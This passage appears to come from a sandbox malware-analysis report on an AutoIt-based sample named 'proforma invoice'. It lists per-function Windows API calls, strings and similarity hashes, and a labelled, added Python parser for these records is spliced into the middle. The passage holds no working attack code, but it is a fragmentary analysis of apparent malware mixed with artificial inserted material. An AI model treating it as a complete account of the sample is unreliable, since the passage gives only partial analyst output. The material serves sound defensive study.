                  • Instruction Fuzzy Hash: C201B571601218ABCB18EFA4CD558FF7BE8EB46350B140A99F822672D1EA3459088660
                  APIs
                    • Part of subcall function 00AA9CB3: _wcslen.LIBCMT ref: 00AA9CBD
                    • Part of subcall function 00B03CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00B03CCA
                  • SendMessageW.USER32(?,00000180,00000000,?), ref: 00B01C46
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: ClassMessageNameSend_wcslen
                  • String ID: ComboBox$ListBox
                  • API String ID: 624084870-1403004172
                  • Opcode ID: 0c1f140b84fc94ee3b7465bacb39f21cda3f68325d3b85f92be0f6627bd8074c
                  • Instruction ID: d38bdbdc74cca1e322ea372c2a2a0688551e608d7c55a85df07b8c39f2b9ea7f
                  • Opcode Fuzzy Hash: 0c1f140b84fc94ee3b7465bacb39f21cda3f68325d3b85f92be0f6627bd8074c
                  • Instruction Fuzzy Hash: 5B01F7716801086BDB28EB94CA529FF7BE8DB16340F140499B406772C1EE24DE4886B1
                  APIs
                    • Part of subcall function 00AA9CB3: _wcslen.LIBCMT ref: 00AA9CBD
                    • Part of subcall function 00B03CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00B03CCA
                  • SendMessageW.USER32(?,00000182,?,00000000), ref: 00B01CC8
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: ClassMessageNameSend_wcslen
                  • String ID: ComboBox$ListBox
                  • API String ID: 624084870-1403004172
                  • Opcode ID: 0b381ff569c258b79d14af2ff7eaf2e45d118773b63c1323cb889c9e42f52997
                  • Instruction ID: ffd989195f0dac9a87e528556594b18fb59b74584fa5279a1ffaf539ebff1831
                  • Opcode Fuzzy Hash: 0b381ff569c258b79d14af2ff7eaf2e45d118773b63c1323cb889c9e42f52997
                  • Instruction Fuzzy Hash: 4701DB7164011867DB28EB94CB55AFF7BECDB12380F140455B801772C1EE24DF18C671
                  APIs
                    • Part of subcall function 00AA9CB3: _wcslen.LIBCMT ref: 00AA9CBD
                    • Part of subcall function 00B03CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00B03CCA
                  • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00B01DD3
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: ClassMessageNameSend_wcslen
                  • String ID: ComboBox$ListBox
                  • API String ID: 624084870-1403004172
                  • Opcode ID: f29b420e3b6582f1083228faf27010ab4d458d92c9deac2046e85e58af811090
                  • Instruction ID: 53c4985bd6329f27dcc578924fd1f3a936136342a5f3f97db317b14462ab300e
                  • Opcode Fuzzy Hash: f29b420e3b6582f1083228faf27010ab4d458d92c9deac2046e85e58af811090
                  • Instruction Fuzzy Hash: 9AF0F971A4161466D718EBA4CD92AFF7BECEB02350F040D95F422632C1DF6459088260
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: _wcslen
                  • String ID: 3, 3, 16, 1
                  • API String ID: 176396367-3042988571
                  • Opcode ID: 64314b9cc58334d9193530f0bea0d788aa0526c1d9b3f552f53439bc798498a6
                  • Instruction ID: ef47896783fac19fde9a2a6ec60e751b5d77d92f49251f8e146aaaa2c97f76d2
                  • Opcode Fuzzy Hash: 64314b9cc58334d9193530f0bea0d788aa0526c1d9b3f552f53439bc798498a6
                  • Instruction Fuzzy Hash: 78E02B066542301092313279BDC1EBF56C9CFC9750710186FF999C236AEEA48D9293AC
                  APIs
                  • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00B00B23
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Message
                  • String ID: AutoIt$Error allocating memory.
                  • API String ID: 2030045667-4017498283
                  • Opcode ID: f0a4f1d97e8ad5136409ddb841e9ac64ef72b3be2aa7089708b83920897948b3
                  • Instruction ID: a0b164f5bd323f98a5c75aae5ce9e17fde5a9b9e418c363d421d6581e0058fd4
                  • Opcode Fuzzy Hash: f0a4f1d97e8ad5136409ddb841e9ac64ef72b3be2aa7089708b83920897948b3
                  • Instruction Fuzzy Hash: E4E0D8322443182AD21036947D03FC97FC8CF05B11F24046AFB58654D38BE1645007E9
                  APIs
                    • Part of subcall function 00ABF7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00AC0D71,?,?,?,00AA100A), ref: 00ABF7CE
                  • IsDebuggerPresent.KERNEL32(?,?,?,00AA100A), ref: 00AC0D75
                  • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00AA100A), ref: 00AC0D84
                  Strings
                  • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00AC0D7F
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                  • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                  • API String ID: 55579361-631824599
                  • Opcode ID: 48614ac4fab4c8af7e4c8f747f8ce5ce72b2fd10219c93358ce3838a1f8d437a
                  • Instruction ID: 7e7074e66c8a27b06820b227f7237b4adf94d61ab1980ed2fe624ce322ede13d
                  • Opcode Fuzzy Hash: 48614ac4fab4c8af7e4c8f747f8ce5ce72b2fd10219c93358ce3838a1f8d437a
                  • Instruction Fuzzy Hash: F3E06D702003118BD3619FBCD904B567BE4AB00740F11496DE887D7661EFB4E4848BA1
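Added example (not part of the Joe Sandbox report or its tooling): a small parser for the per-function records in the layout used above, so the API call lines, the "Part of subcall function" attributions and the Similarity identifiers can be queried instead of scrolled. It assumes the record layout on this page (an "APIs" header starts each record, "Strings" lists referenced strings, "Similarity" holds the ID lines) and decodes the uMsg argument of SendMessageW/PostMessageW with the winuser.h values that occur here (0x180 LB_ADDSTRING, 0x182 LB_DELETESTRING, 0x18B LB_GETTEXT for the ListBox/ComboBox helpers, 0x111 WM_COMMAND for the Shell_TrayWnd post). The sample input is constructed from three records on this page with the memory-dump bookkeeping lines left out. One practical use is isolating the IsDebuggerPresent call at 00AC0D75, which sits beside the "CAtlBaseModule" error string of ATL's standard module initialization and is therefore library code rather than a bespoke anti-debug check, from any debugger checks elsewhere in the binary.

```python
from __future__ import annotations
import re
from dataclasses import dataclass, field

# winuser.h constants for the uMsg values seen in this report's SendMessageW/PostMessageW calls.
WINDOW_MESSAGES = {0x0111: "WM_COMMAND", 0x0180: "LB_ADDSTRING",
                   0x0182: "LB_DELETESTRING", 0x018B: "LB_GETTEXT"}

# One API line: "Name.Module(args), ref: ADDR" or the bare "Name.Module ref: ADDR".
# The optional "Part of subcall function ADDR:" prefix marks a call made inside a callee.
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-F]{8}): )?"
    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]{8})$")

SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}


@dataclass
class ApiCall:
    name: str
    module: str
    args: list[str]
    ref: str                     # address of the call instruction
    subcall: str | None = None   # callee address when the call is attributed to a subcall

    def message_name(self) -> str | None:
        """Decode the uMsg argument (second parameter) of SendMessageW/PostMessageW, if concrete."""
        if self.name not in ("SendMessageW", "PostMessageW") or len(self.args) < 2:
            return None
        try:
            msg = int(self.args[1], 16)
        except ValueError:       # "?" means the analyzer could not resolve the value
            return None
        return WINDOW_MESSAGES.get(msg, f"0x{msg:04X}")


@dataclass
class FunctionRecord:
    apis: list[ApiCall] = field(default_factory=list)
    strings: list[str] = field(default_factory=list)
    meta: dict[str, str] = field(default_factory=dict)  # Similarity block: API ID, String ID, ...


def parse_records(text: str) -> list[FunctionRecord]:
    """Split report text into per-function records; every 'APIs' header starts a new one."""
    records: list[FunctionRecord] = []
    section, current = None, None
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if not line:
            continue
        if line in SECTION_HEADERS:
            if line == "APIs":
                current = FunctionRecord()
                records.append(current)
            section = line
            continue
        if current is None:      # text before the first complete record is ignored
            continue
        if section == "APIs":
            m = API_RE.match(line)
            if m:
                args = m.group("args").split(",") if m.group("args") is not None else []
                current.apis.append(ApiCall(m.group("name"), m.group("module"), args,
                                            m.group("ref"), m.group("sub")))
        elif section == "Strings":
            current.strings.append(line)
        elif section == "Similarity":
            key, _, value = line.partition(":")
            current.meta[key.strip()] = value.strip()
    return records


def calls_named(records: list[FunctionRecord], *names: str) -> list[tuple[int, ApiCall]]:
    """(record index, call) for every direct or subcall API whose name is in `names`."""
    return [(i, c) for i, r in enumerate(records) for c in r.apis if c.name in names]


def decoded_messages(records: list[FunctionRecord]) -> dict[str, str]:
    """Map each resolvable SendMessageW/PostMessageW call address to its message name."""
    return {c.ref: n for r in records for c in r.apis if (n := c.message_name())}


# Constructed sample: three records excerpted from this report, bookkeeping lines omitted.
SAMPLE = """\
APIs
  • Part of subcall function 00AA9CB3: _wcslen.LIBCMT ref: 00AA9CBD
  • Part of subcall function 00B03CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00B03CCA
• SendMessageW.USER32(?,00000180,00000000,?), ref: 00B01C46
Strings
Similarity
• API ID: ClassMessageNameSend_wcslen
• String ID: ComboBox$ListBox
APIs
• IsDebuggerPresent.KERNEL32(?,?,?,00AA100A), ref: 00AC0D75
• OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00AA100A), ref: 00AC0D84
Strings
• ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00AC0D7F
Similarity
• String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00B3232C
• PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00B3233F
  • Part of subcall function 00B0E97B: Sleep.KERNEL32 ref: 00B0E9F3
Similarity
• String ID: Shell_TrayWnd
"""
```

Run `parse_records(SAMPLE)` and then `calls_named(recs, "IsDebuggerPresent")` or `decoded_messages(recs)`; on the full report text the same functions give every debugger-check site and every decoded window message, keyed by call address, so each hit can be matched back to the Opcode ID of the function it belongs to.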
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: LocalTime
                  • String ID: %.3d$X64
                  • API String ID: 481472006-1077770165
                  • Opcode ID: 65d8f9301ba33947f4edcbaab52448f72d99a2611ee295119ab9b5d9e2254b56
                  • Instruction ID: e4ec695414edee3bb04aff097f87698860de312dff6f47488b9d79a1bd98bb21
                  • Opcode Fuzzy Hash: 65d8f9301ba33947f4edcbaab52448f72d99a2611ee295119ab9b5d9e2254b56
                  • Instruction Fuzzy Hash: 1BD012B180810CE9CB5197D0CC458FAB7BDFB08341F608452FA06A2041E634C50867A1
                  APIs
                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00B3232C
                  • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00B3233F
                    • Part of subcall function 00B0E97B: Sleep.KERNEL32 ref: 00B0E9F3
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: FindMessagePostSleepWindow
                  • String ID: Shell_TrayWnd
                  • API String ID: 529655941-2988720461
                  • Opcode ID: 0152af608e82e6fd7f61ad0c01f78029c2b3363cc4bd39c58aa33c3710cc21d9
                  • Instruction ID: 2e773cf9b9ef47f4c363aaadf8e5b1fb74028b31592195ee84950eef5967d599
                  • Opcode Fuzzy Hash: 0152af608e82e6fd7f61ad0c01f78029c2b3363cc4bd39c58aa33c3710cc21d9
                  • Instruction Fuzzy Hash: AED0C936394310B6E664A7B09C0FFDA7E54AB10B10F1149567655BB1E0C9B4A8018B54
                  APIs
                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00B3236C
                  • PostMessageW.USER32(00000000), ref: 00B32373
                    • Part of subcall function 00B0E97B: Sleep.KERNEL32 ref: 00B0E9F3
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: FindMessagePostSleepWindow
                  • String ID: Shell_TrayWnd
                  • API String ID: 529655941-2988720461
                  • Opcode ID: 8f4483355796799d138f42632cf68eb3dff381adf1ec375ffab2ab329058ceb7
                  • Instruction ID: 35ea3d2dc20da3d2ae143acfca3cc77d5f9c1fc5195e6362cfe33caa0b04ef20
                  • Opcode Fuzzy Hash: 8f4483355796799d138f42632cf68eb3dff381adf1ec375ffab2ab329058ceb7
                  • Instruction Fuzzy Hash: 2BD0C9323813107AE664A7B09C0FFCA7A54AB15B10F5149567655BB1E0C9B4A8018B54
                  APIs
                  • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 00ADBE93
                  • GetLastError.KERNEL32 ref: 00ADBEA1
                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00ADBEFC
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: ByteCharMultiWide$ErrorLast
                  • String ID:
                  • API String ID: 1717984340-0
                  • Opcode ID: 2a395a0463644f934f0975004d823af3bea72314187d1ad47d2fb3ac1eeaec5e
                  • Instruction ID: 74ada38d48943c55b244f7ecbd0d1c7d5c07e81a884ff70a84d94336dd8cffe5
                  • Opcode Fuzzy Hash: 2a395a0463644f934f0975004d823af3bea72314187d1ad47d2fb3ac1eeaec5e
                  • Instruction Fuzzy Hash: 5C41C435610246EFCB21CFA5CD44BAA7BA5AF45310F26416AF95A9B3A1DB30DD00DB70